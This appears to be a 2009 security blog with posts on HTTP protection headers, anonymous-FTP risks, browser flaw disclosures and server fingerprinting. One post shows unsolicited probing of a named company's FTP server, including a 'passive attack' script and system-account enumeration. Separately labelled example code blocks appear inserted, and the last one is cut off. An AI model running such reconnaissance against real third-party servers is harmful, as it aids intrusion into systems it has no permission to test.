Security at Stake


HTTP X Protection Headers - Microsoft Google Stringency

Recently I was reading a news headline on SecurityFocus (http://www.securityfocus.com/news/11565) about the flaw in Microsoft's XSS filter implementation and Google's view of it. We have conducted extensive research into understanding the limitations of the filter's design. The point to consider is that even Google has taken steps in response to this functionality, treating it as a negative. Things look quite unsettled in the ongoing scenario.

The terminology refers to the HTTP "X" protection headers: protection parameters implemented at the HTTP header level. Steps are being taken to improve browser-side defenses by introducing these headers and applying them in real-world environments.

With this scenario in mind, I wrote a few lines of Perl to check Google's GWS server on port 80.

[Google Check]

C:\Perl\bin>perl http_X_enum.pl google.com

(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) google.com is subjected to be alive

Server: gws

[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : google.com
[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] detected possible [X-XSS-Protection: 0 ] xss protection parameter : X-XSS-Protection: 0

[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=================[DEBUG]=============================

HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Wed, 25 Nov 2009 02:38:09 GMT
Expires: Fri, 25 Dec 2009 02:38:09 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0


=================[DEBUG]=====================
[+] execution success.


Let's see Yahoo:

C:\Perl\bin>perl http_X_enum.pl yahoo.com

(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) yahoo.com is subjected to be alive


[+] +++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : yahoo.com
[+] +++++++++++++++++++++++++++++++++++++++++++++++++++

[-] http parameter [X-XSS-Protection: 0] not detected.
[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=====================[DEBUG]=====================

HTTP/1.1 301 Moved Permanently
Date: Wed, 25 Nov 2009 02:42:40 GMT
Location: http://www.yahoo.com/
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

95 The document has moved here.
0

==================[DEBUG]======================

[+] execution success.

The script produced the expected results for the two domains. One thing is certain: Google is not at all in line with Microsoft's approach.
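The checks the enumerator performs can be reproduced offline against a saved response. The following is an added Python example, not the post's http_X_enum.pl; the two responses it audits (the google.com reply quoted above, body omitted, and a constructed hardened reply) are embedded as sample input.

```python
"""Audit a raw HTTP response for the browser-side protection headers the
enumerator above looks for: X-XSS-Protection, X-Frame-Options,
X-Content-Type-Options, X-Download-Options and (X-)Content-Security-Policy."""
from email.parser import Parser

# Constructed sample: the google.com 301 response quoted above, body omitted.
GOOGLE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: http://www.google.com/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Cache-Control: public, max-age=2592000\r\n"
    "Server: gws\r\n"
    "Content-Length: 219\r\n"
    "X-XSS-Protection: 0\r\n"
    "\r\n"
)

# Constructed sample of a response that applies every header the post checks.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Download-Options: noopen\r\n"
    "X-Content-Security-Policy: allow 'self'\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw response into its status line and a case-insensitive header
    map. Header names are case-insensitive, so a plain substring search for
    'X-FRAME-OPTIONS' would miss 'x-frame-options'; email.parser handles that."""
    head = raw.replace("\r\n", "\n").partition("\n\n")[0]
    status_line, _, header_text = head.partition("\n")
    return status_line, Parser().parsestr(header_text, headersonly=True)


def audit_headers(raw):
    """Classify each defense as 'applied', 'missing' or 'disabled'."""
    _, h = parse_response(raw)
    report = {}

    xss = h.get("X-XSS-Protection")
    if xss is None:
        report["xss_filter"] = "missing"
    elif xss.split(";")[0].strip() == "0":
        # '0' explicitly switches the IE8 filter off: present, but not a defense
        report["xss_filter"] = "disabled"
    else:
        report["xss_filter"] = "applied"

    xfo = (h.get("X-Frame-Options") or "").strip().upper()
    report["clickjacking"] = "applied" if xfo in ("DENY", "SAMEORIGIN") else "missing"

    ctype = (h.get("X-Content-Type-Options") or "").strip().lower()
    report["mime_sniffing"] = "applied" if ctype == "nosniff" else "missing"

    dl = (h.get("X-Download-Options") or "").strip().lower()
    report["download_options"] = "applied" if dl == "noopen" else "missing"

    csp = h.get("X-Content-Security-Policy") or h.get("Content-Security-Policy")
    report["csp"] = "applied" if csp else "missing"

    # Access-Control-Allow-Origin relaxes the same-origin policy rather than
    # adding a defense, so report its value instead of scoring it.
    report["cors_allow_origin"] = h.get("Access-Control-Allow-Origin")
    return report


if __name__ == "__main__":
    for name, raw in (("google", GOOGLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, audit_headers(raw))
```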

Posted on 11/24/2009 06:25:00 PM by 0kn0ck | 0 Comments

Hakin9 - Extended Edition (Best Of) Featured Papers

Hakin9 has released an extended edition which features some of the best articles chosen by the readers and the team itself. Two of my articles have been included in it:

1. Auditing Oracle in Production Environment
2. Reverse Engineering Binaries

You can look at some of the papers at:

http://hakin9.org/magazine/article

Enjoy!

Posted on 9/28/2009 09:25:00 AM by 0kn0ck | 0 Comments

Infosecurity Article : "Ethical Hacking in Business World"

InfoSecurity has published a new article on the ongoing industry trends of ethical hacking and its different role in the business world.

This article reflects on current security practices and the business's dependency on them, considering the feasibility of core technology. Security concerns are growing at a rapid pace, breaking through every barrier. The business sphere is getting increasingly dependent on automated processes. All monetary transactions and high-end functionality are based on computers. But the positive side is always accompanied by a negative side too.

For more visit

http://fanaticmedia.com/infosecurity/archive/Sep09/Ethical%20Hacking.htm

Posted on 9/19/2009 10:41:00 AM by 0kn0ck | 0 Comments

Vendor Firms and Anonymous Services - Risk or Business Criticality


Security is regarded as a closed asset for any organization. It has been noticed in recent times that many business vendors allow anonymous access to services running on their servers. The concern of this post is not restricted to one part but looks at the diversified impact. The issue appears small, but the resulting impact is high. Anything with default or anonymous access is potentially critical. For example, the most common issue is open FTP access: many organizations allow anonymous access without understanding the consequences that may hamper normal functioning.

There are certain facts:

1. A vendor has to restrict open services.
2. A vendor has to provide standard access to clients even for a simple download. Nowadays, providing open access to services is not considered an appropriate solution. Even from a business perspective, restricted access should be considered. Why open FTP? Why not credential-based access?
3. If a service has to be offered, scrutinize the deployment strategy: should it be exposed on the internet or kept on the intranet?
4. Why not put these services behind a VPN, considering the business need?
5. Consider the configuration of these deployed services. Why not use an organization-specific, policy-based password for FTP access? Why anonymous?
6. Open services are tactically exploited for information gathering and reconnaissance.
7. They can also be used to scan third-party targets.

Question: Is security the prime target, or business?
Answer: An individual and organizational decision, with diversified impacts.

Let's consider a case and the risk emanating from it. For example, an organization is providing open access to FTP services. We will consider specific functions from a security point of view:

1. Passive Mode
2. glob() globbing

"Most FTP daemon implementations provide server-side globbing functionality that performs pattern expansion on these pathnames. The actual glob() implementation is often located in the FTP daemon itself,though some FTP servers use an underlying libc implementation."

"glob - Toggle file name globbing. When file name globbing is enabled, ftp expands csh(1) metacharacters in file and directory names. These characters are *, ?, [, ], ~, {, and }. The server host expands remote file and directory names. Globbing metacharacters are always expanded for the ls and dir commands. If globbing is enabled, metacharacters are also expanded for the multiple-file commands mdelete, mdir, mget, mls, and mput."

An FTP server that provides anonymous access with passive mode enabled is more vulnerable to FTP bounce attacks.

The glob() function has been affected by a number of buffer overflow issues. The ability of a remote or local user to deliver input patterns to glob() implementations creates a risk of exploitation wherever such a vulnerability exists.

Let's have a look at a real-world scenario: an analysis of uptime software, purely as a thought exercise and for knowledge purposes.

Administrator@TopGun ~
$ ftp uptimesoftware.com
Connected to uptimesoftware.com.
220 uptime software FTP services
Name (uptimesoftware.com:Administrator): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> debug
Debugging on (debug=1).
ftp> glob
Globbing off.
ftp> glob on
Globbing on.

ftp> dir
---> PASV
227 Entering Passive Mode (216,220,63,213,73,192)
---> LIST
150 Here comes the directory listing.
-rw-rw-r-- 1 501 501 148181 Feb 07 2008 BMO and uptime software.pdf
drwxrwxr-x 2 501 501 4096 Jun 23 19:08 CVS
lrwxrwxrwx 1 501 501 33 Dec 02 2008 ReleaseNotes_up.time5.pdf -> ../pdfs/ReleaseNotes_up.time5.pdf
lrwxrwxrwx 1 501 501 37 Dec 02 2008 ReleaseNotes_up.time5_SP1.pdf -> ../pdfs/ReleaseNotes_up.tim

So it is easy to look at the rights configured for different user groups.

Administrator@TopGun /cygdrive/c/scripts
$ perl pasvagg.pl uptimesoftware.com
:: connected to uptimesoftware.com
>> 220 uptime software FTP services
:: logging into server as anonymous.
>> 331 Please specify the password.
>> 230 Login successful.
>> 227 Entering Passive Mode (216,220,63,213,89,62)
:: server ready for passive attack
:: sampling passive port selection
:: passive connection rate = 6259.7/sec
:: passive command latency = 0.4 seconds
:: starting the reaper engine

:: starting port 17200

Based on one of my own scripts, let's analyze the reaped information:
Administrator@TopGun /cygdrive/c/my_tools
$ perl ftp_user_reconnaisance.pl uptimesoftware.com
ftp_user_reconnaisance.pl - ftp based system user reconnaisance
written by- 0kn0ck [at] secniche.org

(*) resolving the generic address for domain: uptimesoftware.com
(!) 216.220.63.213

(*) detecting nameservers for the domain : uptimesoftware.com
(!) ns4-auth.q9.com
(!) ns1-auth.q9.com
(!) ns3-auth.q9.com
(!) ns2-auth.q9.com

(*) trying anonymous access on - uptimesoftware.com
(*) anonymous access allowed - uptimesoftware.com
(*) uptimesoftware.com does not support TLS

(*) trying to enumerate the configured system accounts on - uptimesoftware.com

[conn str - 0] - [temp] is not a standard system configured user
[conn str - 1] - [root] is a standard system configured user
[conn str - 2] - [bin] is a standard system configured user
[conn str - 3] - [daemon] is a standard system configured user
[conn str - 4] - [adm] is a standard system configured user
[conn str - 5] - [lp] is a standard system configured user
[conn str - 6] - [sync] is a standard system configured user
[conn str - 7] - [shutdown] is a standard system configured user
[conn str - 8] - [halt] is a standard system configured user
[conn str - 9] - [mail] is a standard system configured user
[conn str - 10] - [news] is a standard system configured user
[conn str - 11] - [uucp] is a standard system configured user
[conn str - 12] - [operator] is a standard system configured user
[conn str - 13] - [games] is a standard system configured user
[conn str - 14] - [gopher] is not a standard system configured user
[conn str - 16] - [apache] is not a standard system configured user
[conn str - 17] - [named] is not a standard system configured user
[conn str - 18] - [amanda] is not a standard system configured user
[conn str - 19] - [indent] is not a standard system configured user
[conn str - 20] - [rpc] is not a standard system configured user
[conn str - 21] - [wnn] is not a standard system configured user
[conn str - 22] - [xfs] is not a standard system configured user
[conn str - 23] - [pvm] is not a standard system configured user
[conn str - 24] - [ldap] is not a standard system configured user
[conn str - 25] - [mysql] is not a standard system configured user
[conn str - 26] - [rpcuser] is not a standard system configured user
[conn str - 27] - [nsf] is not a standard system configured user
[conn str - 28] - [nobody] is a standard system configured user
[conn str - 29] - [junkbust] is not a standard system configured user
[conn str - 30] - [gdm] is not a standard system configured user
[conn str - 31] - [squid] is not a standard system configured user
[conn str - 32] - [nscd] is not a standard system configured user
[conn str - 33] - [rpm] is not a standard system configured user
[conn str - 34] - [mailman] is not a standard system configured user
[conn str - 35] - [radvd] is not a standard system configured user
(*) command completed successfully


The only point in presenting these facts with an example is to show the risks posed and the impact on security.

Finally: why not a mature business with hardened security?
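The permissions and symlink targets visible in a listing like the one above are what a review of anonymous FTP access should check. The following is an added Python example, not the author's pasvagg.pl or ftp_user_reconnaisance.pl, that parses UNIX-style LIST output and flags writable entries and links that resolve outside the directory; the listing, the /pub directory and the anonymous root of '/' are constructed assumptions.

```python
"""Audit a UNIX-style FTP directory listing (the format returned by 'dir' in
the session above) for what an anonymous-access review should flag:
group/world-writable entries and symlinks that resolve outside the anonymous
root. Added example; the listing is constructed after the one shown above."""
import posixpath
import re

# Constructed sample listing, modelled on the one in the post.
LISTING = """\
-rw-rw-r--    1 501      501        148181 Feb 07  2008 BMO and uptime software.pdf
drwxrwxr-x    2 501      501          4096 Jun 23 19:08 CVS
drwxrwxrwx    2 501      501          4096 Jun 23 19:10 incoming
lrwxrwxrwx    1 501      501            33 Dec 02  2008 ReleaseNotes_up.time5.pdf -> ../pdfs/ReleaseNotes_up.time5.pdf
"""

LINE_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<date>\w{3}\s+\d{1,2}\s+[\d:]{4,5})\s+(?P<name>.+)$"
)


def parse_listing(text):
    """Parse LIST output into dicts; 'total N' and unparsable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["type"] = {"-": "file", "d": "dir", "l": "symlink"}[e["mode"][0]]
        e["target"] = None
        if e["type"] == "symlink" and " -> " in e["name"]:
            e["name"], e["target"] = e["name"].split(" -> ", 1)
        entries.append(e)
    return entries


def audit_listing(text, cwd="/pub"):
    """Return (name, reason) findings. cwd is the directory the listing was
    taken in, relative to the anonymous root (assumed here to be '/')."""
    findings = []
    for e in parse_listing(text):
        mode = e["mode"]
        if e["type"] != "symlink":  # a symlink's own mode bits are meaningless
            # mode[1:4] user, mode[4:7] group, mode[7:10] other
            if mode[8] == "w":
                findings.append((e["name"], "world-writable " + e["type"]))
            elif mode[5] == "w":
                findings.append((e["name"], "group-writable " + e["type"]))
        elif e["target"] is not None:
            # Whether an escaping link actually exposes anything depends on the
            # daemon's chroot; flag it for review either way.
            resolved = posixpath.normpath(posixpath.join(cwd, e["target"]))
            if not resolved.startswith(cwd.rstrip("/") + "/"):
                findings.append((e["name"], "symlink leaves %s: %s" % (cwd, resolved)))
    return findings


if __name__ == "__main__":
    for name, why in audit_listing(LISTING):
        print("%-30s %s" % (name, why))
```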

Posted on 8/06/2009 11:07:00 AM by 0kn0ck | 0 Comments

Elsevier - CFSJournal - Breaches in Security Vendor Websites


A new article, "Security breaches in vendor websites", has been released in Elsevier's Computer Fraud and Security Journal.

The security business model revolves around security entities and those security service providers that ensure implementation of secured mechanisms in every aspect of deployment. But how mature are those businesses' own security models? We will evaluate various instances of breaches in security companies and how they occur. The world has seen a number of cases like Kaspersky, F-Secure, a reseller for BitDefender, and so on. There are a number of cases that have not been released publicly. Why is this happening, and what is the root cause? More ........

LINK

Regards

Posted on 8/06/2009 10:56:00 AM by 0kn0ck | 0 Comments

Hakin9 Edition - Article and Self Exposure Interview



Hakin9 has published an article on "Hacking through Wild Cards". This paper sheds light on the usage of wildcard characters that leads to hacking. Wildcard characters are used effectively in various spheres. The inappropriate use of wildcard characters can lead to misconfiguration of parameters, resulting in a number of attacks.

In addition, an interview has been published in the "Self Exposure" section.

You can look into the issue at:

http://hakin9.org/prt/view/about-the-mag/issue/1052.html

Regards

Posted on 7/17/2009 11:58:00 PM by 0kn0ck | 1 Comments

SyScan 09 Conference - Wrap Up


SyScan is one of Asia's prime conferences. This year's conference had a great set of talks by some of the best people in the security field. We organized an ICANPWN contest at SyScan this year. There was a lot of good content and new discoveries by researchers. In particular we saw indispensable research on virtualization: Outspect, a tool for live memory analysis of virtual machines from the host OS, created by Mr. Quynh.
In relation to that there was a lot of good material on PHP, Java, Citrix, BIOS etc. Overall the conference delivered a great deal of knowledge, which is what it aims for.

The CTF was cool and was organized by White Wolf Security. Thanks to Thomas for organizing such a conference.

If you missed the fun, you can watch some of it here:

PICS

Regards

Posted on 7/17/2009 11:25:00 PM by 0kn0ck | 0 Comments

Elsevier - Is Your System Pwned

Elsevier has released a new article, "Is your system pwned".

Article Overview:
"What is the relationship between humans, technology, and fraud? They are all linked together in a triangle. Most monetary transactions today are carried out using digital technologies, most frauds are monetary, and all frauds are perpetuated by people. As fraud prevention experts, we try to break the triangle – to ensure that people don’t interact with technology to create fraudulent situations."

Link to Journal

Regards

Posted on 6/11/2009 06:23:00 AM by 0kn0ck | 0 Comments

Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing





Google Docs was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google discreetly, in order to mitigate the risk. Google worked on it and patched it within a period of 5 days.

Google Docs has now been refined and the integrated support for the Adobe plugin has been removed. User security was the prime issue, because millions of users were at risk if this attack persisted in the open. Integrated accounts were more susceptible, as stolen credentials could be used to access the associated accounts.

The advisory is released here:
http://secniche.org/gmd_hijack/gc_hijack.xhtml
http://secniche.org/gmd_hijack/advisory_gmail_google_docs_pdf_repurposing_attack.pdf

Regards

Posted on 5/11/2009 07:11:00 AM by 0kn0ck | 0 Comments

Troopers 09 Security Conference

The Troopers security conference is one of the finest conferences I have been to. It is very nice to have such a conference in the heart of Germany: great technical content and a nice crew to discuss things and hang around with :). I gave a talk on "Browser Design Flaws". There were some good talks on rootkits, malware for business purposes and web application firewalls. All the talks were good and it was a great learning environment. Visit: Troopers09

Personally I liked the Packet Wars hacking competition by Bryan. It was nicely organized. You can look at it here: Packet Wars. Good hacking games to enjoy.

If you missed the fun, you can have a look at the snaps here: Troopers09 fun

Regards

Posted on 5/02/2009 08:23:00 AM by 0kn0ck | 0 Comments

Google Chrome Alert Single Thread Out of Bound Denial of Service Vulnerability


The vulnerability reported to Google has not been properly understood. More discussion is required on it. The vulnerability link is provided below:

http://secniche.org/gcalrt.html

The denial of service condition reproduces reliably with the reported version.

When this vulnerability is triggered, the following behavior is observed:

1. The browser gets into a locked state and becomes unresponsive. The user cannot perform any operation.
2. It is not restricted to a single tab but impacts all open windows.
3. Killing the process is the only option left.

This works reliably on the Windows XP platform.

Note: The new version of Google Chrome is also vulnerable.

All views are welcome for any type of discussion.

Posted on 4/11/2009 01:56:00 AM by 0kn0ck | 0 Comments

Browsers Behavior : Handling Carriage Return "window.open('\r\n\r\n');" JavaScript Calls


Carriage return and null characters are considered potential elements for testing the behavior of various programs. This works effectively with different browsers too. The resulting output differs noticeably from the normal behavior that browsers should show. The carriage return (CR) is closely tied to the line feed and new line characters. As per the standard definition:

"carriage return character, alone or with a line feed, to signal the end of a line of text, but other characters are also used for this function (see newline); others use it only for a paragraph break (a hard return)"


Based on this fact, a number of tests have been conducted on different browsers. These characters are passed as an argument to the javascript:window.open() function to observe the behavior of the new window. They can be used as one of the fuzzed inputs for testing browser dependencies. Based on this artifact, a Google Chrome advisory was released. The links are mentioned below:

http://www.securityfocus.com/bid/31375

http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23189

http://osvdb.org/show/osvdb/48680

http://www.secniche.org/gcrds.html

That was the vulnerability noticed in Google Chrome, which was patched by the vendor. The behavior noticed consistently across different browsers is:

1. Mozilla Firefox opens a bundle of windows in a single stretch.
2. Google Chrome also opens a number of windows.

Note: We are not considering loops here, only the carriage return character. Some stability has been added because the presence of pop-up blockers stops the execution of these child windows.

We have noticed these differential responses from a number of browsers. I think the CR is a good element to use for fuzzing. Browser behavior is hard to control considering the issue presented above.

Regards

Posted on 3/31/2009 09:51:00 PM by 0kn0ck | 0 Comments

Internet Explorer 8 - Anti Spoofing is a Myth

With the new features implemented in IE 8, the status bar has been transformed too. The new step taken by the Microsoft IE team, not showing the address of the selected link in the status bar, can have a serious impact. A user will not be able to see the active link in the status bar. This looks like an implementation of a security solution through obscurity. The status bar is required for link integrity checks that assure a user of the legitimacy of a website. We are not considering the ingrained vulnerabilities of status bar address spoofing in browsers at this point.

For more details:- http://secniche.org/ie_spoof_myth/

Regards
0kn0ck

Posted on 3/25/2009 11:39:00 AM by 0kn0ck | 0 Comments

Elsevier - NESE Journal - From Vulnerability to Patch

Elsevier has published a new thought article, "From Vulnerability to Patch", in Network Security Journal.

http://www.elsevierscitech.com/nl/ns/home.asp

As is standard, this journal is not freely available; you need to subscribe to it.

Regards
0kn0ck

Posted on 3/14/2009 06:37:00 AM by 0kn0ck | 0 Comments

Evading Web XSS Filters through Word (Microsoft Office and Open Office) in Enterprise Web Applications


This paper sheds light on the hyperlinking issues observed during penetration testing of web-based enterprise applications. This concept can be used to bypass standard XSS filters by creating a malicious Microsoft Word document.

Download the Paper at : HERE

Regards
0kn0ck

Posted on 3/12/2009 03:36:00 AM by 0kn0ck | 0 Comments

Mapping HTTP Interface Embedded Devices

Hakin9 has published a new paper. This paper discusses the generic approach of detecting the HTTP interface of embedded devices. These devices perform a number of different functions based on the infrastructural need.

Check

Regards
0kn0ck

Posted on 2/28/2009 09:50:00 AM by 0kn0ck | 0 Comments

Informer - Hacking for Charity

It is a matter of immense pleasure that researchers all over the world are collaborating for the cause of charity. Be a part of it. It is a very good initiative by Johnny Long. We appreciate his concern and Secniche will be a part of it.

This is a sincere request to all the talent out there to play your part in it.

About Informer:
"The Informer is a fund raising effort run by Hackers For Charity. It is designed to give subscribers a "backstage pass" to the world of Information Security."

Informer - Why?

Hackers for Charity

Get on the same boat for a great cause.

Regards
0kn0ck

Posted on 2/28/2009 09:35:00 AM by 0kn0ck | 0 Comments

Obfuscated HTTP Method Call based Fingerprinting Analysis

Fingerprinting of web servers can be done in different ways. It has been noticed that HTTP methods are not interpreted appropriately by a number of web servers. This can be seen while fuzzing web servers (if the particular HTTP method is included in the fuzz set). With the advent of new scripting languages, a number of different web servers are in the race. Let's first look at some of the web servers in use nowadays. The list is mentioned below:

[Zope Web Server]
Zope is an open source application server for building content management systems, intranets, portals, and custom applications. The Zope community consists of hundreds of companies and thousands of developers all over the world, working on building the platform and Zope applications. Zope is written in Python, a highly-productive, object-oriented scripting language.

[Mongrel Web Server]
Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby
web applications of any kind using plain HTTP rather than FastCGI or SCGI.

[Jetty]
Jetty is an open-source, standards-based, full-featured web server implemented entirely in Java.

These are a number of web servers used extensively in open source development. IIS and Apache (in different variants) are always in the picture.

The point that needs to be scrutinized is request acceptance by the web server and the ability of open source web servers to understand the HTTP method properly. IIS and Apache are efficient in handling rogue requests. But other web servers fail to show this kind of behavior (interpreting HTTP requests properly).

This discussion covers the following basic points:

1. Effectiveness and pervasiveness of web servers in interpreting the HTTP method call.
2. The type of response sent by the server.
3. The type of exceptions that occur.

There are a number of tools that fingerprint web servers. There is no doubt that 70% of web servers deployed globally can be identified by fetching banners. But our aim is to perform fingerprinting with minimum information. That's where fuzzing becomes really critical. We have critically examined the behavior of the entities mentioned below and their collective use to fingerprint web servers.

1. Rogue HTTP Method Call Invocation.
2. A long string of the /\/\/\/\/\/\/\/\ expression.

We have used the backslash character. According to regular expression and pattern matching theory, the backslash character can serve the following purposes:

1) stand for itself,
2) quote the next character,
3) introduce an operator,
4) do nothing.

It depends a lot on the context in which the backslash character is used. We will see the behavior of a number of web servers when a specific request is sent.

$ nc www.example.com 80
JAG /\/\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 13:48:37 GMT
Server: Mongrel 1.1.3
Status: 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 708
Set-Cookie: _session_id=5537174372e814e02fee588aa67c4a2a; path=/
Connection: close


It responds with the HTTP/1.1 specification and 404 Not Found (the server has not found anything matching the URI given). That's right. Another point that should not be neglected about the Mongrel web server is that it adds a Status header to the response. This behavior is shown only by the Mongrel web server. On the other hand, the server does not point out the HTTP method used for the call invocation.

$ nc example.org 80
JAG /\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Tue, 24 Feb 2009 13:53:29 GMT
Server: Jetty/5.1.14 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=4537fb13-e021-4cdb-bb50-4e3a8bfbb6fa;Path=/;Domain=.z1014ba.ningops.com;Expires=Fri, 22-Feb-19 13:53:29 GMT
X-XN-Trace-Token: 8702916f-3dbd-4d51-978c-06abbe2adf73
Allow: GET, HEAD, POST, PUT, DELETE, MOVE, OPTIONS, TRACE
Content-Type: text/html
Content-Length: 1246
Connection: close


The Jetty web server responds with 405 (the client has tried to use a request method that the server does not allow. The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource). As Jetty is written in Java, the HTTP methods that are allowed to be executed are explicitly configured most of the time.

For the Zope server we will consider two cases, as structured below.

$ nc example.com 80
JAG /\ HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 24 Feb 2009 14:11:37 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Content-Length: 59
Content-Type: text/plain; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close
webdav.NullResource.NullResource object at 0x2aaaacda0b18


The server responds with a 200 OK (the request is fulfilled) response code. There is a null pointer exception at the end, too. Let's look at a different layout:

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 14:03:42 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Bobo-Exception-Line: 66
Content-Length: 1403
Bobo-Exception-Value: See the server error log for details
Bobo-Exception-File: NullResource.py
Bobo-Exception-Type: NotFound
Content-Type: text/html; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close


We are not considering the exceptions here. You can see the server responds with 404 (this status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable).
The response differs with string manipulation. Either there is ambiguity, or the code does not handle the request effectively.

Let's try this behavior on Microsoft IIS and Apache.

$ nc microsoft.com 80
JAG /\/\/\/\/\/\/\ HTTP/1.0


HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 24 Feb 2009 14:06:06 GMT
Connection: close

The response code is 501 (the server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource). It is quite correct as per the desired logic.

$ nc apache.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 501 Method Not Implemented
Date: Tue, 24 Feb 2009 14:50:58 GMT
Server: Apache/2.2.9 (Unix)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1


The same result, 501, is returned by Apache. The differential pattern is shown below:

IIS Server Response String -- HTTP/1.1 501 Not Implemented
Apache Server Response String -- HTTP/1.1 501 Method Not Implemented

The word "Method" is not present in the IIS response. This is generic behavior.

The most widely used web servers implement the HTTP method invocation check, which is largely missing from other web servers. Two questions arise:

1. Does the web server implement a check on HTTP method call invocation?
2. Are web servers processing requests based on the URI only?

This all depends on the web server implementation. Let's try this logic on proxies:

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.0 400 Bad Request
Server: squid/2.7.STABLE6
Date: Tue, 24 Feb 2009 14:00:52 GMT
Content-Type: text/html
Content-Length: 1207
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache5.zmh.zope.net
Via: 1.0 cache5.zmh.zope.net:8300 (squid/2.7.STABLE6)
Connection: close

The proxy server responds with 400 Bad Request, with the same HTTP/1.0 version. The proxy intercepts and scrutinizes the HTTP method and request URI at the perimeter level.

The behavior is again different compared to the web servers. This analysis lays stress on the HTTP method call check, which is required to prune down the fingerprinting process based on this factor.

If all web servers responds back with 501 code then it should be consider as a unanimous behavior among different web browsers.
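The same check in code, as an added example and not the blog's own Perl or nc tooling: it builds the JAG probe, parses a raw response, and classifies the server by reason phrase, Allow header and proxy headers rather than by the Server banner. The three sample responses are reconstructed from the IIS, Apache and Squid replies quoted above; probe() is the only function that touches the network and is not called by default.

```javascript
// Added example, not the blog's own tooling: fingerprint a web server or
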